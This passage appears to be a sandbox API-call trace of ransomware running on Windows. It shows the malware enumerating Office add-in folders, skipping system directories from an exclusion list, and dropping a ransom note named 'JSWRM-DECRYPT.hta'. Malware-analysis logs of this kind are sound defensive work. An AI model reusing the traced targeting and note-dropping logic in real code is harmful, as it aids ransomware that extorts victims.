lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.152] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17ef5ba, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17ef5ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.152] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.152] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="hu", cAlternateFileName="")) returned 1 [0123.152] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0123.152] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0123.152] lstrcmpiW (lpString1="hu", lpString2="...") returned 1 [0123.152] lstrcmpiW (lpString1="hu", lpString2="windows") returned -1 [0123.152] lstrcmpiW (lpString1="hu", lpString2="recovery") returned -1 [0123.152] lstrcmpiW (lpString1="hu", lpString2="perflogs") returned -1 [0123.153] lstrcmpiW (lpString1="hu", lpString2="documents and settings") returned 1 [0123.153] lstrcmpiW (lpString1="hu", lpString2="$RECYCLE.BIN") returned 1 [0123.153] lstrcmpiW (lpString1="hu", lpString2="system volume information") returned -1 [0123.153] lstrcmpiW (lpString1="hu", lpString2="msocache") returned -1 [0123.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hu\\jswrm-decrypt.hta")) returned 0xffffffff [0123.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.157] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.157] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.158] CloseHandle (hObject=0x338) returned 1 [0123.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.158] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hu\\jswrm-decrypt.hta")) returned 0x20 [0123.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.158] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hu\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40128163, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0123.159] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.159] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40128163, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.159] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.159] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.159] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40128163, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40128163, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40128163, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.159] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0123.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0123.159] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf75a8fbb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf75a8fbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf75a8fbb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.159] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.159] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.160] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ebbef3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.160] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.161] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1945af2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1945af2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.161] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0123.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.162] 